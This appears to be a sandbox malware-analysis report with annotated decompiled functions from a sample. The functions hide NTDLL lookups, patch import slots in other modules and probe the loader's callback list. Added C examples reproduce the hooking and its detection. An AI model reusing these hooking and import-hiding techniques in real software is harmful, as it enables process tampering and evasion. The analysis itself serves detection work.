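    install_jmp_rel32(prologue, kFuncVa, kHookVa);

    if (!decode_jmp_rel32(prologue, kFuncVa, &dest))
        return 0;
    return dest == kHookVa && jmp_leaves_module(dest, kModBase, kModSize);
}

int main(void)
{
    printf("hooked prologue flagged: %s\n", demo_detects_hook() ? "yes" : "no");
    printf("decoded destination: 0x%08lx\n",
           (unsigned long)jmp_roundtrip(kFuncVa, kHookVa));
    return 0;
}
```

                                          Against a live process the same decoder would be fed bytes read from the target (ReadProcessMemory) and the module range from the loaded-module list; the two VirtualProtect calls in the decompiled routine (0x40, then 0x20 or the saved value) are what makes those bytes writable for the patch and executable again afterwards.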


                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,00AB5488,0000001C,00AB3B7D,00B169A8,00000004,00B16948,00000004,00B169A0,00000002,00000000,?,00AB3F7B), ref: 00AB3BEA
                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00B16948,00000004,00B169A8), ref: 00AB3C45
                                          • VirtualProtect.KERNEL32(?,00000005,?,?), ref: 00AB3C80
                                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,00B16948,00000004,00B169A8), ref: 00AB3C97
                                          • EnterCriticalSection.KERNEL32(00B16E20), ref: 00AB3CAA
                                          • LeaveCriticalSection.KERNEL32(00B16E20), ref: 00AB3CC8
                                          • GetLastError.KERNEL32(?,00AB3F7B,00000002,00000000,00000001,00B1699C,?,00AB3EB1,00B16948,00AB1B07,00000000), ref: 00AB3CDD
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$CriticalSection$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 2664878573-0
                                          • Opcode ID: e23293cee978327396bff5c2c36b1ec8f78df001771dee60e0089ed728b3d5d9
                                          • Instruction ID: b9731cd67f5cc9cfde6291e472bfc2e391378018a42d13d929e83a35e74247f7
                                          • Opcode Fuzzy Hash: e23293cee978327396bff5c2c36b1ec8f78df001771dee60e0089ed728b3d5d9
                                          • Instruction Fuzzy Hash: 60415DB2900704AFDB20DFB9DD49AAABBF8BF08310F144519F545EB292D770DA45DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			// Resolves and caches three NTDLL exports: LdrLoadDll, LdrGetProcedureAddress and
                                          			// NtProtectVirtualMemory. Each address is stored as a 64-bit value (cdq sign-extends
                                          			// eax into edx), so the cache is six dwords at 0xb16d0c..0xb16d20 and 0x18 bytes are
                                          			// copied out to the caller's buffer _a4. Returns 0 on success and 0x7f (127, the Win32
                                          			// value of ERROR_PROC_NOT_FOUND) if ntdll or any of the three exports cannot be found.
                                          			// Going through GetModuleHandleW plus a private lookup (E00AB2DC0) avoids importing
                                          			// GetProcAddress for these names.
                                          			E00AB1DD0(void* __ecx, signed int __edx, void* _a4) {
                                          				signed int _t2;
                                          				signed int _t6;
                                          				signed int _t8;
                                          				signed int _t10;
                                          				signed int _t13;
                                          				signed int _t15;
                                          				void* _t17;
                                          				void* _t18;
                                          				void* _t20;
                                          				void* _t22;
                                          				signed int _t25;
                                          				void* _t27;
                                          
                                          				_t25 = __edx;
                                          				_t18 = __ecx;
                                          				_t2 =  *0xb16d0c; // 0x0
                                          				_t27 = 0;
                                          				if((_t2 |  *0xb16d10) == 0) {                // LdrLoadDll slot empty: resolve everything
                                          					L3:
                                          					_t27 = 0x7f;                             // assume failure until all three lookups succeed
                                          					_t26 = GetModuleHandleW(L"NTDLL.DLL");  // ntdll is always mapped, so no LoadLibrary is needed
                                          					if(_t4 != 0) {                           // _t4 is the decompiler's name for the GetModuleHandleW result (_t26)
                                          						_t6 = E00AB2DC0(_t17, _t18, _t26, "LdrLoadDll");   // export lookup by name (body not shown)
                                          						asm("cdq");                          // sign-extend eax into edx:eax
                                          						 *0xb16d0c = _t6;                    // low dword
                                          						_pop(_t20);
                                          						 *0xb16d10 = _t25;                   // high dword (edx)
                                          						if((_t6 | _t25) != 0) {
                                          							_t8 = E00AB2DC0(_t17, _t20, _t26, "LdrGetProcedureAddress");
                                          							asm("cdq");
                                          							 *0xb16d14 = _t8;
                                          							_pop(_t22);
                                          							 *0xb16d18 = _t25;
                                          							if((_t8 | _t25) != 0) {
                                          								_t10 = E00AB2DC0(_t17, _t22, _t26, "NtProtectVirtualMemory");
                                          								asm("cdq");
                                          								 *0xb16d1c = _t10;
                                          								 *0xb16d20 = _t25;
                                          								if((_t10 | _t25) != 0) {
                                          									_t27 = 0;                    // all three resolved: success
                                          									goto L8;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					// Cache already populated; verify the other two slots before handing it out.
                                          					_t13 =  *0xb16d14; // 0x0
                                          					if((_t13 |  *0xb16d18) == 0) {
                                          						goto L3;
                                          					} else {
                                          						_t15 =  *0xb16d1c; // 0x0
                                          						if((_t15 |  *0xb16d20) != 0) {
                                          							L8:
                                          							memcpy(_a4, 0xb16d0c, 0x18);         // copy the three 64-bit entries to the caller
                                          						} else {
                                          							goto L3;
                                          						}
                                          					}
                                          				}
                                          				return _t27;                                 // 0 on success, 0x7f on failure
                                          			}


                                          APIs
                                          • GetModuleHandleW.KERNEL32(NTDLL.DLL,00000000,00000000,?,00AB1C8A,00000000), ref: 00AB1E06
                                          • memcpy.NTDLL(00AB1C8A,00B16D0C,00000018,?,00AB1C8A,00000000), ref: 00AB1E75
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModulememcpy
                                          • String ID: LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$NtProtectVirtualMemory
                                          • API String ID: 1801490239-862099514
                                          • Opcode ID: faf9136bf6e539c7dbdda90503cb1013d67d21405897c1b47f6482d5d375ea74
                                          • Instruction ID: 472179f79f190cf511a61eb2ac79fc1998607231d29ded373fdc29cff1ec6dd5
                                          • Opcode Fuzzy Hash: faf9136bf6e539c7dbdda90503cb1013d67d21405897c1b47f6482d5d375ea74
                                          • Instruction Fuzzy Hash: 63116576B44604AAD315BB6CBC42AE67BEDB7847103A4C93BF404D71A3DEB1990087B4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			// E00AB3D0B: installs a pointer-sized hook. From the stack accesses: [ebp+8] = hook
                                          			// descriptor (_t74), [ebp+0xC] = target module, [ebp+0x10] = optional out-pointer that
                                          			// receives the bookkeeping record. Returns 0 on success or a Win32 error code.
                                          			// Comments are editorial annotations of what the listing shows; the sample carries no symbols.
                                          			E00AB3D0B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                          				long _t53;
                                          				long _t54;
                                          				void _t56;
                                          				void _t67;
                                          				void** _t68;
                                          				intOrPtr* _t74;
                                          				signed int _t75;
                                          				void* _t76;
                                          				intOrPtr _t77;
                                          				void* _t79;
                                          				long _t81;
                                          				void* _t82;
                                          				intOrPtr _t84;
                                          				void* _t85;
                                          
                                          				_push(0x1c);
                                          				_push(0xab5478);
                                          				E00AB1000(__ebx, __edi, __esi); // MSVC SEH prologue: scope table 0xAB5478, 0x1C bytes of locals
                                          				 *(_t85 - 0x20) =  *(_t85 - 0x20) & 0x00000000;
                                          				 *(_t85 - 0x1c) =  *(_t85 - 0x1c) & 0x00000000;
                                          				_t75 = 0;
                                          				_t77 =  *0xb16d94; // 0x0 (number of entries in the module table at 0xB16D90, see the loop at the end)
                                          				if(_t77 == 0) {
                                          					L4:
                                          					_t74 =  *((intOrPtr*)(_t85 + 8)); // hook descriptor
                                          					if(( *(_t74 + 4) & 0x00000001) == 0) { // descriptor flag bit 0 selects which identifier goes to the resolver
                                          						_t14 = _t74 + 8; // 0x2
                                          						 *(_t85 - 0x20) =  *_t14; // whole dword at +0x8
                                          					} else {
                                          						_t12 = _t74 + 0xc; // 0xb1681c
                                          						 *(_t85 - 0x1c) =  *_t12 & 0x0000ffff; // low 16 bits of +0xC (ordinal-sized)
                                          					}
                                          					_t53 = E00AB38C4(_t85 - 0x28); // allocate the bookkeeping record; its address lands in [ebp-0x28] (_t79)
                                          					_pop(_t76);
                                          					_t81 = _t53;
                                          					if(_t81 != 0) {
                                          						L24:
                                          						_t54 = _t81;
                                          						L25:
                                          						return E00AB103B(_t54); // SEH epilogue; _t54 is the result code
                                          					} else {
                                          						_t17 = _t74 + 0x14; // 0x2
                                          						_t56 =  *_t17;
                                          						_t79 =  *(_t85 - 0x28);
                                          						if(_t56 == 0) {
                                          							_t19 = _t74 + 0x10; // 0x0
                                          							_t56 =  *_t19;
                                          						}
                                          						 *(_t79 + 0x14) = _t56; // value to be written: descriptor+0x14, falling back to +0x10
                                          						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000; // SEH try level 0: the patch below runs inside __try
                                          						_t82 = E00AB4215(_t76,  *((intOrPtr*)(_t85 + 0xc)),  *_t74,  *(_t85 - 0x20),  *(_t85 - 0x1c), E00AB3995); // resolve the slot in the target module (callback E00AB3995)
                                          						if(_t82 != 0) {
                                          							L13:
                                          							 *(_t85 - 0x20) =  *(_t85 - 0x20) & 0x00000000;
                                          							if(VirtualProtect(_t82, 4, 0x40, _t85 - 0x20) == 0) { // make the 4-byte slot PAGE_EXECUTE_READWRITE
                                          								_t81 = GetLastError();
                                          								goto L20;
                                          							}
                                          							 *((intOrPtr*)(_t79 + 0x18)) = _t74;
                                          							if( *(_t74 + 0x18) == 0) {
                                          								 *(_t74 + 0x18) =  *_t82; // descriptor keeps the pristine slot value (first install only)
                                          							}
                                          							 *(_t79 + 8) =  *_t82; // record keeps the old value (twice) and the slot address
                                          							 *(_t79 + 0xc) = _t82;
                                          							 *(_t79 + 0x10) =  *_t82;
                                          							 *_t82 =  *(_t79 + 0x14); // the actual patch: a single pointer-sized write
                                          							VirtualProtect(_t82, 4,  *(_t85 - 0x20), _t85 - 0x20); // restore the previous protection
                                          							 *(_t79 + 0x1c) =  *(_t79 + 0x1c) | 0x00000101; // mark the record active
                                          							EnterCriticalSection(0xb16e20); // InsertHeadList into the global hook list headed at 0xB16E38
                                          							_t67 =  *0xb16e38; // 0x0
                                          							 *_t79 = _t67;
                                          							 *(_t79 + 4) = 0xb16e38;
                                          							 *(_t67 + 4) = _t79;
                                          							 *0xb16e38 = _t79;
                                          							LeaveCriticalSection(0xb16e20);
                                          							_t81 = 0;
                                          							 *((intOrPtr*)(_t85 - 0x24)) = 0;
                                          							_t68 =  *(_t85 + 0x10);
                                          							if(_t68 != 0) {
                                          								 *_t68 = _t79; // hand the record back through the optional out-pointer
                                          							}
                                          							goto L21;
                                          						} else {
                                          							_t82 = E00AB40C4(_t76,  *((intOrPtr*)(_t85 + 0xc)),  *_t74,  *(_t85 - 0x20),  *(_t85 - 0x1c)); // second resolver, same identifiers, no callback
                                          							if(_t82 == 0) {
                                          								_t81 = 2; // 2 = ERROR_FILE_NOT_FOUND: neither resolver found a slot
                                          								L20:
                                          								 *((intOrPtr*)(_t85 - 0x24)) = _t81;
                                          								L21:
                                          								 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff; // leave __try
                                          								if(_t81 != 0) {
                                          									LocalFree(_t79); // the record is dropped on every failure path
                                          								}
                                          								goto L24;
                                          							}
                                          							goto L13;
                                          						}
                                          					}
                                          				}
                                          				_t84 =  *0xb16d90; // 0x0
                                          				while( *((intOrPtr*)(_t85 + 0xc)) !=  *((intOrPtr*)(_t84 + _t75 * 4))) { // is the target module one of the _t77 entries at 0xB16D90?
                                          					_t75 = _t75 + 1;
                                          					if(_t75 < _t77) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				_t54 = 0; // module is listed: nothing is patched and success is reported
                                          				goto L25;
                                          			}

















                                          Instruction addresses behind the listing above (the report's side column, in listing order; 0x00000000 marks a line with no instruction): 0x00ab3d0b 0x00ab3d0d 0x00ab3d12 0x00ab3d17 0x00ab3d1b 0x00ab3d1f 0x00ab3d21 0x00ab3d29 0x00ab3d3e 0x00ab3d3e 0x00ab3d45 0x00ab3d57 0x00ab3d5a 0x00ab3d47 0x00ab3d47 0x00ab3d4b 0x00ab3d4b 0x00ab3d61 0x00ab3d66 0x00ab3d67 0x00ab3d6b 0x00ab3e86 0x00ab3e86 0x00ab3e88 0x00ab3e8d 0x00ab3d71 0x00ab3d71 0x00ab3d71 0x00ab3d74 0x00ab3d79 0x00ab3d7b 0x00ab3d7b 0x00ab3d7b 0x00ab3d7e 0x00ab3d81 0x00ab3d9d 0x00ab3da1 0x00ab3dc0 0x00ab3dc0 0x00ab3dd5 0x00ab3e4e 0x00000000 0x00ab3e4e 0x00ab3dd7 0x00ab3dde 0x00ab3de2 0x00ab3de2 0x00ab3de7 0x00ab3dea 0x00ab3def 0x00ab3df5 0x00ab3e01 0x00ab3e07 0x00ab3e14 0x00ab3e1a 0x00ab3e1f 0x00ab3e21 0x00ab3e28 0x00ab3e2b 0x00ab3e32 0x00ab3e38 0x00ab3e3a 0x00ab3e3d 0x00ab3e42 0x00ab3e44 0x00ab3e44 0x00000000 0x00ab3da3 0x00ab3db6 0x00ab3dba 0x00ab3e54 0x00ab3e55 0x00ab3e55 0x00ab3e58 0x00ab3e58 0x00ab3e7e 0x00ab3e81 0x00ab3e81 0x00000000 0x00ab3e7e 0x00000000 0x00ab3dba 0x00ab3da1 0x00ab3d6b 0x00ab3d2b 0x00ab3d31 0x00ab3d39 0x00ab3d3c 0x00000000 0x00000000 0x00000000 0x00ab3d3c 0x00ab3d50 0x00000000

                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000), ref: 00AB3DCD
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000), ref: 00AB3E01
                                          • EnterCriticalSection.KERNEL32(00B16E20), ref: 00AB3E14
                                          • LeaveCriticalSection.KERNEL32(00B16E20), ref: 00AB3E32
                                          • GetLastError.KERNEL32 ref: 00AB3E48
                                          • LocalFree.KERNEL32(00000000), ref: 00AB3E81
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalProtectSectionVirtual$EnterErrorFreeLastLeaveLocal
                                          • String ID:
                                          • API String ID: 567920170-0
                                          • Opcode ID: 4a0d8b3a9021b6d5cf79d72b4b42849714d4873a68aef56e8061682b87462f65
                                          • Instruction ID: 5acb3fa1f696e83b29003223eb7b91941793dc2004ce8b96167b27f70405fdc8
                                          • Opcode Fuzzy Hash: 4a0d8b3a9021b6d5cf79d72b4b42849714d4873a68aef56e8061682b87462f65
                                          • Instruction Fuzzy Hash: D7416972D00625AFCF219F64C844BEEBBF8BF08710F558659E904AB252D774EA40DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%
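E00AB3D0B above resolves a pointer-sized slot in a target module, saves the slot's contents, overwrites it with the value from the descriptor and links a record of the installation into a global list. As an added example (not code from the report or from the sample), the following portable C models that bookkeeping end to end against a constructed in-memory import table that stands in for the real module. The descriptor and record offsets follow the field accesses in the listing; the field names, the reading of +0x8 as a name and +0xC as an ordinal, the `find_slot` stand-in for E00AB4215/E00AB40C4 and the `remove_hook` counterpart are this example's assumptions. The two VirtualProtect calls the sample needs on Windows are left as comments so the example runs anywhere.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef int (*api_fn)(int);

/* Hook descriptor as E00AB3D0B reads it ([ebp+8], _t74); offsets mirror the listing,
   reading +0x8 as a name and +0xC as an ordinal is this example's assumption. */
struct hook_desc {
    const char *module;   /* +0x00: handed to the slot resolver */
    uint32_t    flags;    /* +0x04: bit 0 set -> use +0xC (low 16 bits), clear -> use +0x8 */
    const char *name;     /* +0x08 */
    uint32_t    ordinal;  /* +0x0C */
    api_fn      hook;     /* +0x10: written when +0x14 is NULL */
    api_fn      hook_alt; /* +0x14: written when non-NULL */
    api_fn      original; /* +0x18: pristine slot value, set on first install */
};
/* Bookkeeping record (allocated by E00AB38C4, linked into the list at 0xB16E38). */
struct hook_rec {
    struct hook_rec *flink, *blink; /* +0x00, +0x04 */
    api_fn  saved;                  /* +0x08 (and +0x10): slot contents before the write */
    api_fn *slot;                   /* +0x0C: the patched 4-byte slot */
    api_fn  written;                /* +0x14: value placed in the slot */
    struct hook_desc *desc;         /* +0x18 */
    uint32_t state;                 /* +0x1C: |= 0x101 once active */
};
static struct hook_rec g_hooks = { &g_hooks, &g_hooks };  /* empty list head */
/* Constructed import table standing in for the target module. */
#define NIMPORTS 2
static const struct { const char *name; uint16_t ordinal; } g_imports[NIMPORTS] =
    { { "ReadFile", 1 }, { "CloseHandle", 2 } };
static api_fn g_iat[NIMPORTS];

/* Stand-in for the resolvers E00AB4215 / E00AB40C4: address of the slot, or NULL. */
static api_fn *find_slot(const struct hook_desc *d) {
    for (int i = 0; i < NIMPORTS; i++) {
        if ((d->flags & 1) ? g_imports[i].ordinal == (d->ordinal & 0xffff)
                           : (d->name && strcmp(g_imports[i].name, d->name) == 0))
            return &g_iat[i];
    }
    return NULL;
}

/* Same outcome as the sample: 0 on success, 2 (ERROR_FILE_NOT_FOUND) when no slot
   matches; the record is freed on failure and handed back via *out on success. */
int install_hook(struct hook_desc *d, struct hook_rec **out) {
    struct hook_rec *rec = calloc(1, sizeof *rec);
    if (!rec) return 8;                        /* ERROR_NOT_ENOUGH_MEMORY */
    rec->written = d->hook_alt ? d->hook_alt : d->hook;
    api_fn *slot = find_slot(d);
    if (!slot) { free(rec); return 2; }
    /* Windows: VirtualProtect(slot, 4, PAGE_EXECUTE_READWRITE, &old) here; table slots sit in read-only pages. */
    rec->desc = d;
    if (!d->original) d->original = *slot;    /* keep the pristine value once */
    rec->saved = *slot; rec->slot = slot;
    *slot = rec->written;                      /* the one pointer-sized write */
    /* Windows: VirtualProtect(slot, 4, old, &old) restores the protection. */
    rec->state |= 0x101;
    rec->flink = g_hooks.flink; rec->blink = &g_hooks;   /* InsertHeadList; the sample */
    g_hooks.flink->blink = rec; g_hooks.flink = rec;     /* holds a critical section here */
    if (out) *out = rec;
    return 0;
}
/* Counterpart not shown in this part of the report: restore the slot and unlink. */
void remove_hook(struct hook_rec *rec) {
    *rec->slot = rec->saved;
    rec->blink->flink = rec->flink;
    rec->flink->blink = rec->blink;
    free(rec);
}

static int real_read(int x)  { return x + 1; }
static int real_close(int x) { return x + 2; }
static struct hook_desc g_read_desc;
/* Replacement that reaches the original through desc+0x18, as a hook would. */
static int hooked_read(int x) { return g_read_desc.original(x) * 100; }

/* Full round trip; returns 0 if every check holds, otherwise the failing step. */
int run_hook_demo(void) {
    g_iat[0] = real_read; g_iat[1] = real_close; g_hooks.flink = g_hooks.blink = &g_hooks;
    memset(&g_read_desc, 0, sizeof g_read_desc);
    g_read_desc.module = "kernel32.dll"; g_read_desc.name = "ReadFile"; g_read_desc.hook = hooked_read;
    struct hook_rec *rec = NULL;
    if (install_hook(&g_read_desc, &rec) != 0 || !rec) return 1;
    if (g_iat[0] != hooked_read || g_read_desc.original != real_read) return 2;
    if (g_iat[0](5) != 600) return 3;          /* (5 + 1) * 100 through the hook */
    if (g_hooks.flink != rec || rec->blink != &g_hooks || (rec->state & 0x101) != 0x101) return 4;
    struct hook_desc missing = { "kernel32.dll", 1, NULL, 99, hooked_read, NULL, NULL };
    if (install_hook(&missing, NULL) != 2) return 5;   /* no ordinal 99: error 2 */
    remove_hook(rec);
    if (g_iat[0] != real_read || g_iat[0](5) != 6 || g_hooks.flink != &g_hooks) return 6;
    return 0;
}

int main(void) {
    int r = run_hook_demo();
    printf("pointer-slot hook round trip: %s (%d)\n", r == 0 ? "ok" : "FAILED", r);
    return r;
}
```

The round trip exercises the paths the listing has: a descriptor that resolves, the fallback to +0x10 when +0x14 is empty, the hard-coded error 2 when nothing resolves, and the head insertion that leaves the record first in the list. For detection the interesting part is not the list but the write itself: a 4-byte VirtualProtect to PAGE_EXECUTE_READWRITE on a page inside another module's headers or import table, immediately followed by a second VirtualProtect that restores the old protection, which is exactly the API pair the report lists for this function.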

                                          C-Code - Quality: 100%
                                          			// E00AB307D: reads a whole file into a freshly allocated, NUL-terminated buffer.
                                          			// _a4 = path, _a8 receives the buffer, _a12 the byte count. Returns 0 or a Win32
                                                    			// error code. Comments are editorial annotations; the sample carries no symbols.
                                          			E00AB307D(void* __ecx, CHAR* _a4, void** _a8, long* _a12) {
                                          				long _v8;
                                          				long _v12;
                                          				long _t15;
                                          				long _t23;
                                          				long _t26;
                                          				void* _t28;
                                          				void* _t31;
                                          
                                          				_t23 = 0;
                                          				_t31 = 0;
                                          				_t28 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                                          				if(_t28 == 0xffffffff) { // INVALID_HANDLE_VALUE
                                          					L8:
                                          					_t23 = GetLastError();
                                          					L9:
                                          					if(_t28 != 0xffffffff) {
                                          						CloseHandle(_t28);
                                          					}
                                          					if(_t31 != 0 && _t23 != 0) {
                                          						LocalFree(_t31); // buffer is released only on failure; on success the caller owns it
                                          					}
                                          					return _t23;
                                          				}
                                          				_t15 = GetFileSize(_t28, 0); // INVALID_FILE_SIZE (0xFFFFFFFF) is not checked; _t15 + 1 below would wrap to 0
                                          				_v8 = _t15;
                                          				if(_t15 != 0) {
                                          					_t31 = E00AB1490(_t15 + 1); // size + 1 for the terminator
                                          					if(_t31 == 0 || ReadFile(_t28, _t31, _v8,  &_v12, 0) == 0) {
                                          						goto L8;
                                          					} else {
                                          						_t26 = _v8;
                                          						if(_t26 == _v12) { // the whole file arrived in one ReadFile call
                                          							 *((char*)(_t31 + _t26)) = 0;
                                          							 *_a8 = _t31;
                                          							 *_a12 = _t26;
                                          						} else {
                                          							_t23 = 0x1e; // 30 = ERROR_READ_FAULT: short read
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          				_t23 = 0xe8; // 232 = ERROR_NO_DATA: empty file
                                          				goto L9;
                                          			}










                                          Instruction addresses behind the listing above (the report's side column, in listing order; 0x00000000 marks a line with no instruction): 0x00ab3085 0x00ab309a 0x00ab30a2 0x00ab30a7 0x00ab30fc 0x00ab3102 0x00ab3104 0x00ab3107 0x00ab310a 0x00ab310a 0x00ab3112 0x00ab3119 0x00ab3119 0x00ab3126 0x00ab3126 0x00ab30ab 0x00ab30b1 0x00ab30b6 0x00ab30c6 0x00ab30ca 0x00000000 0x00ab30e0 0x00ab30e0 0x00ab30e6 0x00ab30f0 0x00ab30f3 0x00ab30f8 0x00ab30e8 0x00ab30ea 0x00ab30ea 0x00000000 0x00ab30e6 0x00ab30ca 0x00ab30b8 0x00000000

                                          APIs
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,00AB1A97,00B16CF4,00B16D04), ref: 00AB309C
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?,00000000), ref: 00AB30AB
                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,00000001,?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?), ref: 00AB30D6
                                          • GetLastError.KERNEL32(?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?,00000000), ref: 00AB30FC
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?,00000000), ref: 00AB310A
                                          • LocalFree.KERNEL32(00000000,?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?,00000000), ref: 00AB3119
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateErrorFreeHandleLastLocalReadSize
                                          • String ID:
                                          • API String ID: 2671872497-0
                                          • Opcode ID: c1906b15bee95c9df72cb7b9f332c413775f856fd72695cbf1b38a97ff3fdaac
                                          • Instruction ID: 0aaeaed1f272e806b3b95e7b499c2a6fd0f20d2c9f66cdde4963e7a9a502c08d
                                          • Opcode Fuzzy Hash: c1906b15bee95c9df72cb7b9f332c413775f856fd72695cbf1b38a97ff3fdaac
                                          • Instruction Fuzzy Hash: 4611B172A00609AFDF21AFA89C85BFE7A6CEF05764F100254F905A7292DA318E4196A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			// E00AB441C: finds a loader-maintained list inside NTDLL by probing. It scans a
                                          			// region of ntdll.dll for empty LIST_ENTRY heads, temporarily links its own
                                          			// {Flink, Blink, callback, context} entry at each one, loads and unloads
                                          			// ntdsapi.dll so the loader runs its callbacks, and returns the head whose
                                          			// insertion made E00AB4593 fire (0 if none did). The entry shape matches the
                                          			// one LdrRegisterDllNotification keeps; that reading is an interpretation,
                                          			// the report itself does not name the list. Comments are editorial.
                                          			E00AB441C(void* __eflags) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				char* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr* _v24;
                                          				char _v28;
                                          				void* _t23;
                                          				char* _t27;
                                          				char _t28;
                                          				struct HINSTANCE__* _t30;
                                          				intOrPtr* _t31;
                                          				char _t33;
                                          				char _t35;
                                          				char* _t36;
                                          				intOrPtr _t37;
                                          				intOrPtr _t40;
                                          				struct HINSTANCE__* _t41;
                                          				intOrPtr* _t45;
                                          
                                          				_t41 = GetModuleHandleW(L"NTDLL.DLL");
                                          				_t23 = E00AB44D1(_t41); // returns a header whose +8 (size) and +0xC (RVA) are used below, consistent with IMAGE_SECTION_HEADER.VirtualSize/VirtualAddress
                                          				_t33 = 0;
                                          				if(_t23 != 0) {
                                          					_t35 = 0;
                                          					_t45 =  *((intOrPtr*)(_t23 + 0xc)) + _t41; // start of the region: base + RVA
                                          					_v8 = 0; // context flag, set by the callback
                                          					_t40 =  *((intOrPtr*)(_t23 + 8)) + 0xfffffff8 + _t45; // last 8-byte pair inside the region
                                          					_v12 = _t40;
                                          					asm("stosd"); // zero the local entry
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v16 =  &_v8; // entry.Context = &_v8
                                          					_t27 =  &_v28;
                                          					_v20 = E00AB4593; // entry.Callback
                                          					_v24 = _t27; // entry.Blink = &entry
                                          					_v28 = _t27; // entry.Flink = &entry (self-linked, i.e. empty)
                                          					while(_t45 <= _t40) {
                                          						_t28 =  *_t45;
                                          						if(_t28 == _t45 && _t28 ==  *((intOrPtr*)(_t45 + 4))) { // Flink == Blink == self: an empty list head
                                          							_v28 = _t28; // InsertHeadList(head, &entry)
                                          							_t36 =  &_v28;
                                          							_v24 = _t45;
                                          							 *((intOrPtr*)(_t28 + 4)) = _t36;
                                          							 *_t45 = _t36;
                                          							_t30 = LoadLibraryA("ntdsapi.dll"); // any load/unload makes the loader walk its callback list
                                          							if(_t30 != 0) {
                                          								FreeLibrary(_t30);
                                          							}
                                          							_t37 = _v28; // RemoveEntryList(&entry): the head is left exactly as found
                                          							_t31 = _v24;
                                          							_t40 = _v12;
                                          							 *_t31 = _t37;
                                          							 *((intOrPtr*)(_t37 + 4)) = _t31;
                                          							_t35 = _v8; // did E00AB4593 run (it reaches _v8 through Context)?
                                          							_t33 =  !=  ? _t45 : _t33; // decompiler dropped the left operand; given the loop exit below it is _t35: keep this head if the callback fired
                                          						}
                                          						_t45 = _t45 + 8; // next pointer pair
                                          						if(_t35 == 0) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          				}
                                          				return _t33;
                                          			}





















